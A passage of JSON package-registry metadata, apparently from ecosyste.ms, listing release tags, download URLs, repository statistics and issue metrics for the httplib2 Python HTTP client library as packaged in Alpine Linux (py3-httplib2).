httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T02:01:46.967Z","dependent_packages_count":4,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":1.745460237946149,"stargazers_count":12.942235441452723,"forks_count":8.144176581089543,"average":5.707968065122103},"purl":"pkg:apk/alpine/py3-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":"fabian@affolter-engineering.ch","url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":426,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-01-31T23:30:14.124Z","updated_at":"2023-01-31T23:30:14.124Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-edge","url":"https://pkgs.alpinelinux.org/packages?branch=edge","ecosystem":"alpine","default":false,"packages_count":39959,"maintainers_count":905,"namespaces_count":3,"keywords_count":6584,"github":"alpinelinux","metadata":{"repos":["main","community","testing"],"funded_packages_count":2944},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.616Z","updated_at":"2026-08-25T05:06:28.429Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/namespaces"}},{"id":6194463,"name":"py3-httplib2","ecosystem":"alpine","description":"Python3 HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2021-05-22T13:08:56.000Z","latest_release_published_at":"2021-05-22T13:08:56.000Z","latest_release_number":"0.19.0-r1","last_synced_at":"2026-03-08T18:22:48.629Z","created_at":"2023-02-01T01:35:46.646Z","updated_at":"2026-08-22T02:37:25.364Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.14/community/x86_64/py3-httplib2","install_command":"apk add py3-httplib2","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at